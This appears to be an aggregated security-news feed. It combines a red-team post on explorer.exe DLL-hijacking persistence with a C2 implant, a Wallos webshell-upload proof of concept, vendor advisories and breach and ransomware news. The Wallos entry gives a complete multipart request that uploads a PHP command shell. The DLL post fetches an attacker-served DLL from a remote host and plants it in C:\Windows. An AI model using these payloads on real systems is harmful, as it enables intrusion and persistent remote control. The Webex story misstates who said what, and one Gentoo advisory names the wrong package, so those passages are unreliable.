Windows File Explorer is the is the graphical file management utility for the Windows operating system and the default desktop environment. Windows explorer was introduced… 
Continue reading → Persistence – Explorer

Skip to content

Windows File Explorer is the is the graphical file management utility for the Windows operating system and the default desktop environment. Windows explorer was introduced in Windows 95 and it is associated with the process _explorer.exe_. Since this is a native Windows process it could be used in red team operations for injection of arbitrary code. Processes which are missing DLL’s are prone to DLL Hijacking. Identification of missing DLL’s is trivial and requires process monitor to filter the _explorer.exe_ for results that contain _NAME NOT FOUND_. One of the missing DLL’s that _explorer.exe_ is missing is the cscapi.

Process Monitor – cscapi.dll

An HTTP server is required to serve the arbitrary DLL. From a Kali Linux box this is trivial by executing the following command:

    python3 -m http.server 8080

Python Web Server

A public tool has been released that will communicate with the host serving the arbitrary DLL, retrieve and write the DLL into _C:\\Windows_ path. The tool require the IP address and the port of the server hosting the DLL and the DLL name.

    DLLHijacking.exe 10.0.0.3 8080 demon.x64.dll

Explorer.exe – DLL Hijacking

Explorer.exe – cscapi.dll

The arbitrary DLL will load into the _explorer.exe_ process on the next reboot and a communication channel with the Command and Control will established.

Explorer.exe – Implant

Host Enumeration

**References**

1.  https://github.com/gavz/ExplorerPersist

**Rate this:**

**Post navigation**

Persistence – Explorer

### Impact

_What kind of vulnerability is it? Who is impacted?_

Access to pages is granted regardless of role permissions for webspaces which have a security system configured and permission check enabled. Webspaces without do not have this issue.

### Patches

Has the problem been patched? What versions should users upgrade to?

The problem is patched with Version `2.4.17` and `2.5.13`.

### Workarounds

_Is there a way for users to fix or remediate the vulnerability without upgrading?_

Remove  following lines from `vendor/symfony/security-http/HttpUtils.php`:

```
-            // Shortcut if request has already been matched before
-            if ($request->attributes->has('_route')) {
-                return $path === $request->attributes->get('_route');
 -           }
```

Or do not install `symfony/security-http` versions greater equal than `v5.4.30` or `v6.3.6`.

### References

_Are there any links users can visit to find out more?_

Currently no references.


**Impact**

_What kind of vulnerability is it? Who is impacted?_

Access to pages is granted regardless of role permissions for webspaces which have a security system configured and permission check enabled. Webspaces without do not have this issue.

**Patches**

Has the problem been patched? What versions should users upgrade to?

The problem is patched with Version 2.4.17 and 2.5.13.

**Workarounds**

_Is there a way for users to fix or remediate the vulnerability without upgrading?_

Remove following lines from vendor/symfony/security-http/HttpUtils.php:

    -            // Shortcut if request has already been matched before
    -            if ($request->attributes->has('_route')) {
    -                return $path === $request->attributes->get('_route');
     -           }
    

Or do not install symfony/security-http versions greater equal than v5.4.30 or v6.3.6.

**References**

_Are there any links users can visit to find out more?_

Currently no references.

**References**

*   GHSA-jr83-m233-gg6p
*   sulu/sulu@ec9c3f9

GHSA-jr83-m233-gg6p: Sulu grants access to pages regardless of role permissions

By Waqas
Another day, another third-party data breach!
This is a post from HackRead.com Read the original post: American Express Cardholders Impacted by Third-Party Vendor Data Breach

American Express cardholders are advised to be vigilant after a data breach at a third-party vendor potentially exposed some card information. While American Express systems remain secure, the breach may have compromised card numbers, names, expiration dates, and other details.

American Express notified card members today of a data breach impacting some customer information, emphasizing that its systems were not compromised. The breach originated from a third-party service provider used by numerous merchants, potentially exposing customer details including card numbers, names, and expiration dates.

****What Happened:****

American Express discovered unauthorized access to a system utilized by a third-party service provider engaged by various merchants. This incident may have compromised the account information of some American Express card members.

American Express has filed a data breach notification with the state of Massachusetts regarding potential impacts on cardholder information, which may include current or previously issued American Express card numbers, cardholder names, and card information such as expiration dates.

> _“At this time, we have been informed that your current or previously issued American Express Card account number, your name and other Card information such as the expiration date, may have been compromised. Please be aware that you may receive additional letters from us if more than one of your American Express Card accounts were involved.”_
> 
> American Express

In response to this situation, American Express has taken several measures to address the issue. The company has affirmed the security of its own systems and is actively monitoring accounts for any signs of fraudulent activity.

Additionally, cardholders are reassured that they are not liable for unauthorized charges. American Express has provided resources and information on fraud protection through its Security Center website.

For insights into this, we reached out to Piyush Pandey, CEO at Pathlock who stated, “Over the last few years, we’ve seen a significant uptick in third-party data breaches. In this example, there are multiple parties, or what we call “nth party” risk. This places a much greater emphasis on organizations to vet their third parties during onboarding to minimize access risk.”

Piyush also cautioned businesses about the importance of scrutinizing third parties before entering into business partnerships with them. “Organizations must also ensure that the third-party partners of the third parties they are doing business with are assessed for access risk. It should become part of standard third-party contracts to specify breach response responsibilities,” he explained. “Masking data to provide only what is needed by third parties to provide services must be a best practice.”

Nevertheless, American Express card members are advised to review their account statements for any suspicious activity, especially over the next 12-24 months. They are also encouraged to enable account notifications via the American Express Mobile app or through email/text messaging for added security.

Furthermore, updating contact information with American Express is recommended to ensure smooth communication if necessary.

****Rising Incidents of Third-Party Data Breaches****

The beginning of 2024 has witnessed a noticeable uptick in data breaches affecting diverse sectors, including corporate entities and governmental organizations. On February 23 2024, a threat actor using the alias IntelBroker leaked 2.4 million data belonging to private plane owners linked to the Los Angeles International Airport.

In August 2023, an IT contractor employed by the Metropolitan Police Force experienced a cyberattack that impacted over 50,000 MET police personnel.

In September 2023, a third-party contractor experienced a data breach that affected over 8,000 Greater Manchester Police Officers. In October 2023, another contractor inadvertently exposed their database, resulting in the leakage of sensitive details about 500,000 Irish Police vehicle seizure records.

1.  **23andMe blames its users for the massive data breach**
2.  **AnyDesk Urges Password Change Amid Security Breach**
3.  **Defunct Ambulance Service Data Breach Impacts 1 Million**
4.  **Cloudflare Hacked After State Actor Leverages Okta Breach**
5.  **RingGo Owner EasyPark Hit by Data Breach, User Data Stolen**
6.  **LockBit Ransomware Claims Data Breach at SpaceX Contractor**
7.  **CutOut.Pro AI Tool Data Breach: Hacker Leak 20 Million User Info**

American Express Cardholders Impacted by Third-Party Vendor Data Breach

The transaction, visible on Bitcoin's blockchain, suggests the victim of one of the worst ransomware attacks in years may have paid a very large ransom.

The ransomware attack targeting medical firm Change Healthcare has been one of the most disruptive in years, crippling pharmacies across the US—including those in hospitals—and leading to serious snags in the delivery of prescription drugs nationwide for 10 days and counting. Now, a dispute within the criminal underground has revealed a new development in that unfolding debacle: One of the partners of the hackers behind the attack points out that those hackers, a group known as AlphV or BlackCat, received a $22 million transaction that looks very much like a large ransom payment.

On March 1, a Bitcoin address connected to AlphV received 350 bitcoins in a single transaction, or close to $22 million based on exchange rates at the time. Then, two days later, someone describing themselves as an affiliate of AlphV—one of the hackers who work with the group to penetrate victim networks—posted to the cybercriminal underground forum RAMP that AlphV had cheated them out of their share of the Change Healthcare ransom, pointing to the publicly visible $22 million transaction on Bitcoin's blockchain as proof.

That suggests, according to Dmitry Smilyanets, the researcher for security firm Recorded Future who first spotted the post, that Change Healthcare has likely paid AlphV's ransom. “You can see the number of coins that landed there. You don’t see that kind of transaction so often,” Smilyanets says. “There’s proof of a large amount landing in the AlphV-controlled Bitcoin wallet. And this affiliate connects this address to the attack on Change Healthcare. So it’s likely that the victim paid the ransom.”

A spokesperson for Change Healthcare, which is owned by UnitedHealth Group, declined to answer whether it had paid a ransom to AlphV, telling WIRED only that “we are focused on the investigation right now.”

Both Recorded Future and TRM Labs, a blockchain analysis firm, connect the Bitcoin address that received the $22 million payment to the AlphV hackers. TRM Labs says it can link the address to payments from two other AlphV victims in January.

If Change Healthcare did pay a $22 million ransom, it would not only represent a huge payday for AlphV, but also a dangerous precedent for the health care industry, argues Brett Callow, a ransomware-focused researcher with security firm Emsisoft. Every ransomware payment, he says, both funds future attacks by the group responsible and suggests to other ransomware predators that they should try the same playbook—in this case, attacking health care services that patients depend on.

“If Change did pay, it's problematic,” says Callow. “It highlights the profitability of attacks on the health care sector. Ransomware gangs are nothing if not predictable: If they find a particular sector to be lucrative, they’ll attack it over and over again, rinse and repeat.”

The self-described AlphV affiliate who first posted evidence of the payment on RAMP, and who goes by the name “notchy,” complained that AlphV had apparently collected the $22 million ransom from Change Healthcare and then kept the entire sum, rather than share the profits with their hacking partner as they had allegedly agreed. “Be careful everyone and stop deal with ALPHV," notchy wrote.

That affiliate hacker also wrote that in their penetration of Change Healthcare's network, they had accessed the data of numerous other health care firms partnered with the company. If that claim is accurate, Recorded Future's Smilyanets points out, it creates the additional risk that the affiliate hacker still possesses sensitive medical information. Even if Change Healthcare did pay AlphV, the hacker affiliate could still demand additional payment or leak the data independently.

“The affiliates still have this data, and they’re mad they didn’t receive this money,” says Smilyanets. “It’s a good lesson for everyone. You cannot trust criminals; their word is worth nothing.”

As ransomware payments go, $22 million would represent a remarkably profitable score for AlphV. Only a relatively small number of ransoms in the history of ransomware, such as the $40 million payment made by the financial firm CNA to the hackers known as Evil Corp, have been so large, says Emsisoft's Callow. “It’s not without precedent, but it’s certainly very unusual,” he says.

Regardless of whether Change Healthcare is confirmed to have paid that ransom, the attack shows that AlphV has pulled off a disturbing comeback: In December, it was the target of an FBI operation that seized its dark web sites and released decryption keys that foiled its attacks on hundreds of victims. Just two months later, it carried out the cyberattack that paralyzed Change Healthcare, triggering an outage whose effects on pharmacies and their patients have now stretched well beyond a week. As of last Tuesday, AlphV listed 28 companies on the dark web site it uses to extort its victims, not including Change Healthcare.

That site has now gone offline. The reason for that disappearance—whether due to another law enforcement operation or AlphV's attempts to dodge its own cheated affiliates—is unclear. Ransomware trackers say AlphV has disappeared and rebranded several times before. Earlier incarnations under the name BlackCat, BlackMatter, and Darkside were all more or less the same group, security researchers note.

In fact, the hackers working under that Darkside handle were responsible for the 2021 Colonial Pipeline ransomware attack that triggered the shutdown of gas transportation across the Eastern Seaboard of the US and resulted in a brief fuel shortage in some East Coast cities. In that case, too, the victims paid the hackers' ransom. “It was the hardest decision I've made,” Colonial's CEO Joseph Blount later told a US congressional hearing.

Now, it seems, some of the same hackers may have forced yet another company to make that same hard decision.

_Update 3/4/2024, 1:50 pm EST: Included additional contextual details about AlphV and related ransomware attacks._

Hackers Behind the Change Healthcare Ransomware Attack Just Received a $22 Million Payment

By Deeba Ahmed
Leaked Military Audio Raises Stakes in Russia-Ukraine Conflict.
This is a post from HackRead.com Read the original post: Russian Operatives Expose German Military Webex Conversations

In the recording, four senior Bundeswehr (German Armed Forces) officers are discussing the hypothetical export of Taurus cruise missiles to Ukraine, and how to attack Russian infrastructure through them.

Russian spies leaked a 38-minute audio file of German military officials discussing Taurus cruise missile deliveries to Ukraine, raising questions about the military’s information security practices, as reported by Russian state broadcaster RT.

The German Defence Ministry has accused Russia of launching an “information war” following the publication of the recording of a meeting of senior German military officials, calling the incident an act of eavesdropping and a “hybrid disinformation attack” by Russia-backed spies.

Reportedly, the spies could record the conversation by joining a Webex conference. The conversation reveals plans for the shipment of advanced weaponry to pro-Russian separatists in eastern Ukraine and a possible military strike on Crimea, a Ukrainian peninsula currently under Russian control. 

It is worth noting that Kyiv wants Germany’s Taurus missiles, long-range missiles from France and Britain, and Ukrainian soldier training amid the ongoing war in Ukraine since the country is facing soldiers and ammunition shortages. The transcript of the conversation, which took place on 19 February, was published by RT on 1st March. 

In the recording, four senior Bundeswehr (German Armed Forces) officers are discussing the hypothetical export of Taurus cruise missiles to Ukraine, and how to attack Russian infrastructure through them.

German Chancellor Olaf Scholz refuses to send such long-range cruise missiles, causing splintering within the country’s governing coalition. The recording, shared on social media, revealed that the German Air Force’s chief, Lieutenant General Ingo Gerhartz **expressed** concern about direct connections with the Ukrainian armed forces. 

Russian officials also discussed potential targets for Taurus missiles donated to Ukraine, the training time for local personnel, and the possibility of using the missiles to destroy the Kerch bridge linking Crimea to Russia.

They also discussed preparations for a meeting with MP Boris Pistorius to send around 10-20 Taurus missiles from Germany’s 600-strong stockpile to counter Russia’s air defences and destroy the Kerch connection. They also discussed transporting data for Taurus programming from German airbases into Ukraine.

As per DW, the Defence Ministry has confirmed the recording’s authenticity and German Chancellor Olaf Scholz referred to it as a “very serious matter.” German Social Democrats MP Pistorius criticized the leaked audio, stating it was suspiciously published just before opposition leader Alexei Navalny’s funeral. 

Germany’s Military Counterintelligence Service is investigating the leaked audio, which comes just days after Scholz inferred that British and French staff are helping calibrate missile targets for Ukrainians.

1.  Microsoft Executives’ Emails Breached by Russia Hackers
2.  Russian Hackers Hit Mail Servers in Europe for Military Intel
3.  Russian APT29 Hacked US Biomedical Giant in TeamCity Breach
4.  Russian Hackers Target Ubiquiti Routers for Data, Botnet Creation
5.  Microsoft Outlook Flaw Exploited by Russian Forest Blizzard Group

Russian Operatives Expose German Military Webex Conversations

Gentoo Linux Security Advisory 202403-3 - Multiple vulnerabilities have been discovered in UltraJSON, the worst of which could lead to key confusion and value overwriting. Versions greater than or equal to 5.4.0 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202403-03  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: UltraJSON: Multiple Vulnerabilities  
     Date: March 03, 2024  
     Bugs: #855689  
       ID: 202403-03

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in UltraJSON, the worst of  
which could lead to key confusion and value overwriting.

Background  
==========

UltraJSON is an ultra fast JSON encoder and decoder written in pure C  
with bindings for Python 3.8+.

Affected packages  
=================

Package           Vulnerable    Unaffected  
----------------  ------------  ------------  
dev-python/ujson  < 5.4.0       >= 5.4.0

Description  
===========

Affected versions were found to improperly decode certain characters.  
JSON strings that contain escaped surrogate characters not part of a  
proper surrogate pair were decoded incorrectly. Besides corrupting  
strings, this allowed for potential key confusion and value overwriting  
in dictionaries. All users parsing JSON from untrusted sources are  
vulnerable. From version 5.4.0, UltraJSON decodes lone surrogates in the  
same way as the standard library's `json` module does, preserving them  
in the parsed output.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All UltraJSON users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=dev-python/ujson-5.4.0"

References  
==========

[ 1 ] CVE-2022-31116  
      https://nvd.nist.gov/vuln/detail/CVE-2022-31116  
[ 2 ] CVE-2022-31117  
      https://nvd.nist.gov/vuln/detail/CVE-2022-31117

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202403-03

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202403-03

TP-Link JetStream Smart Switch TL-SG2210P version 5.0 build 20211201 suffers from a privilege escalation vulnerability.

**TP-Link JetStream Smart Switch TL-SG2210P 5.0 Build 20211201 Privilege Escalation**

    [+] Credits: Shahnawaz Shaikh, Security Researcher at Cybergate Defense LLC[+] twitter.com/_striv3r_[Vendor]Tp-Link (http://tp-link.com)[Product]JetStream Smart Switch - TL-SG2210P v5.0 Build 20211201[Vulnerability Type]Improper Access Control[Affected Product Code Base]JetStream Smart Switch - TL-SG2210P v5.0 Build 20211201[Affected Component]usermanagement, swtmactablecfg endpoints of webconsole[CVE Reference]CVE-2023-43318[Security Issue]TP-Link JetStream Smart Switch TL-SG2210P 5.0 Build 20211201 allowsattackers to escalate privileges via modification of the 'tid' and 'usrlvl'values in GET requests.[Exploit/POC]N/A[Network Access]Remote[Severity]High[Disclosure Timeline]Vendor Notification: September 12, 2023Vendor released fixed firmware TL-SG2210P(UN)_V5.20_5.20.1 Build 20240202:February 29, 2024March 1, 2024 : Public Disclosure

TP-Link JetStream Smart Switch TL-SG2210P 5.0 Build 20211201 Privilege Escalation

Gentoo Linux Security Advisory 202403-2 - Multiple vulnerabilities have been discovered in Blender, the worst of which could lead to arbitrary code execution. Versions greater than or equal to 3.1.0 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202403-02  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: Blender: Multiple Vulnerabilities  
     Date: March 03, 2024  
     Bugs: #834011  
       ID: 202403-02

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in Blender, the worst of  
which could lead to arbitrary code execution.

Background  
==========

Blender is a 3D Creation/Animation/Publishing System.

Affected packages  
=================

Package            Vulnerable    Unaffected  
-----------------  ------------  ------------  
media-gfx/blender  < 3.1.0       >= 3.1.0

Description  
===========

Multiple vulnerabilities have been discovered in Blender. Please review  
the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Blender users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=media-gfx/blender-3.1.0"

References  
==========

[ 1 ] CVE-2022-0544  
      https://nvd.nist.gov/vuln/detail/CVE-2022-0544  
[ 2 ] CVE-2022-0545  
      https://nvd.nist.gov/vuln/detail/CVE-2022-0545  
[ 3 ] CVE-2022-0546  
      https://nvd.nist.gov/vuln/detail/CVE-2022-0546

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202403-02

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202403-02

Wallos versions prior to 1.11.2 suffer from a remote shell upload vulnerability.

# Exploit Title: Wallos - File Upload RCE (Authenticated)  
# Date: 2024-03-04  
# Exploit Author: sml@lacashita.com  
# Vendor Homepage: https://github.com/ellite/Wallos  
# Software Link: https://github.com/ellite/Wallos  
# Version: < 1.11.2  
# Tested on: Debian 12

Wallos allows you to upload an image/logo when you create a new subscription.  
This can be bypassed to upload a malicious .php file.

POC  
---

1) Log into the application.  
2) Go to "New Subscription"  
3) Upload Logo and choose your webshell .php  
4) Make the Request changing Content-Type to image/jpeg and adding "GIF89a", it should be like:

--- SNIP -----------------

POST /endpoints/subscription/add.php HTTP/1.1

Host: 192.168.1.44

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0

Accept: */*

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: http://192.168.1.44/

Content-Type: multipart/form-data; boundary=---------------------------29251442139477260933920738324

Origin: http://192.168.1.44

Content-Length: 7220

Connection: close

Cookie: theme=light; language=en; PHPSESSID=6a3e5adc1b74b0f1870bbfceb16cda4b; theme=light

-----------------------------29251442139477260933920738324

Content-Disposition: form-data; name="name"

test

-----------------------------29251442139477260933920738324

Content-Disposition: form-data; name="logo"; filename="revshell.php"

Content-Type: image/jpeg

GIF89a;

<?php  
system($_GET['cmd']);  
?> 

-----------------------------29251442139477260933920738324

Content-Disposition: form-data; name="logo-url"

----- SNIP -----

5) You will get the response that your file was uploaded ok:

{"status":"Success","message":"Subscription updated successfully"}

6) Your file will be located in:   
http://VICTIM_IP/images/uploads/logos/XXXXXX-yourshell.php

Wallos Shell Upload

Gentoo Linux Security Advisory 202403-1 - A vulnerability has been discovered in Tox which may lead to remote code execution. Versions greater than or equal to 0.2.13 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202403-01  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: Tox: Remote Code Execution  
     Date: March 03, 2024  
     Bugs: #829650  
       ID: 202403-01

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A vulnerability has been discovered in Tox which may lead to remote code  
execution.

Background  
==========

Tox is easy-to-use software that connects you with friends and family  
without anyone else listening in.

Affected packages  
=================

Package       Vulnerable    Unaffected  
------------  ------------  ------------  
net-libs/tox  < 0.2.13      >= 0.2.13

Description  
===========

A vulnerability has been discovered in btrbk. Please review the CVE  
identifier referenced below for details.

Impact  
======

A stack-based buffer overflow allows remote attackers to crash the  
process or potentially execute arbitrary code via a network packet.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Tox users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=net-libs/tox-0.2.13"

References  
==========

[ 1 ] CVE-2021-44847  
      https://nvd.nist.gov/vuln/detail/CVE-2021-44847

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202403-01

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Tag

#web